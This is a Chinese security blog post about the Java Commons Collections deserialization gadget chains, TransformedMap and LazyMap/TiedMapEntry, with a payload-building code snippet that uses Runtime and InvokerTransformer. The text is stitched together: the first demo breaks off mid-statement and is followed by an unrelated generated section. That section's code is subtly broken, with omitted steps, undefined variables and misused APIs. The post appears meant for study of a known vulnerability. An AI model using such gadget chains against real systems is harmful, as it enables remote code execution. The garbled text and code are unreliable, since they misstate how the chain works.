java安全(七) 反序列化3 CC利用链 TransformedMap版

本文介绍了Java反序列化中CommonCollections的TransformedMap利用链,通过图解和代码示例详细阐述了如何利用TransformedMap、Transformer、ConstantTransformer、InvokerTransformer和ChainedTransformer执行命令。简化后的demo展示了不依赖反射的CC利用链执行流程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

给个关注?宝儿!
给个关注?宝儿!
给个关注?宝儿!

众所周知,CommonCollections利⽤链是作为反序列化学习不可绕i过的一关

图解

先挂一张wh1te8ea的利用链图解,非常直观!
在这里插入图片描述

代码demo

分析:

代码使用了phith0n大佬的代码,对原本复杂的源码进行了优化,适合复现以及更加深刻理解

demo代码:

package test.org.vulhub.Ser;



import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.util.HashMap;
import java.util.Map;

public class CommonCollections1 {
   
    public static void main(String[] args) throws Exception {
   
        Transformer[] transformers = new Transformer[]
### Java Commons Collections 反序列化利用 CVE 漏洞分析 #### 背景介绍 Java中的反序列化功能允许对象在网络传输或者存储介质之间转换成字节流并恢复回原状。然而,如果应用程序在不受信任的数据源上执行反序列化操作,则可能被恶意构造的对象所利用,进而触发任意代码执行等问题。 #### Apache Commons Collections 漏洞概述 Apache Commons Collections 是一个广泛使用的第三方库,在本小于等于3.2.1时存在严重的反序列化漏洞[^2]。该漏洞使得攻击者能够创建特制的输入数据来操纵程序逻辑,最终实现远程代码执行的目的。 #### 关键类与调用条解析 针对`CommonsCollections`组件内的多个类可以构建出不同的gadget chain(工具),这些条通常涉及以下几种类: - **Transformers系列**:如 `ConstantTransformer`, `InvokerTransformer` 等用于定义特定行为变换器; - **TiedMapEntry**: 实现了 Map.Entry 接口,并且其getValue方法会触发之前设置好的transformer; - **LazyMap**: 当尝试获取不存在key对应的value时,它会自动计算这个值; 当上述组件按照一定顺序组合起来形成完整的调用路径之后就构成了所谓的“利用”。例如,在某些情况下可以通过精心设计的输入让 LazyMap 的 getValue 方法间接调用了 InvokerTransformer 中预设的方法名参数,从而达到控制目标进程的效果[^1]。 #### POC 构造思路 对于具体的 Proof Of Concept (POC),一般遵循如下模式: 1. 创建一系列必要的 Transformer 对象实例。 2. 使用 TiedMapEntry 将最后一个 transformer 和其他部分连接在一起。 3. 利用 HashMap 或 ArrayList 来承载整个结构体作为外部可见载体。 4. 最终将此复合型实体传递给待测系统的某个入口点完成实际攻击过程[^3]。 以下是基于以上描述的一个简单示例代码片段展示如何组装这样的payload: ```java // 定义所需的各种transfomer... Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}), ... }; // 构建tied entry关联到invoker transformer的结果 Map innerMap = new HashMap(); innerMap.put(key,value); Map outerMap = LazyMap.decorate(innerMap,new ChainedTransformer(transformers)); Map.Entry tiedEntry = Maps.immutableEntry(key,tiedValue); // 准备好用来发送出去的实际负载形式 Object payload = new HashMap(); ((Map)payload).put(tiedEntry,"whatever"); ``` 请注意这只是一个简化的概念证明演示,真实环境中还需要考虑更多细节因素才能成功实施此类攻击。 #### 影响范围及修复建议 受影响的产品和服务非常广泛,特别是那些依赖于旧本 commons-collections 库的应用程序都可能存在风险。官方已经发布新本解决了这个问题,因此强烈建议开发者尽快升级至最新稳定发行以消除安全隐患[^4]。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

b1gpig安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值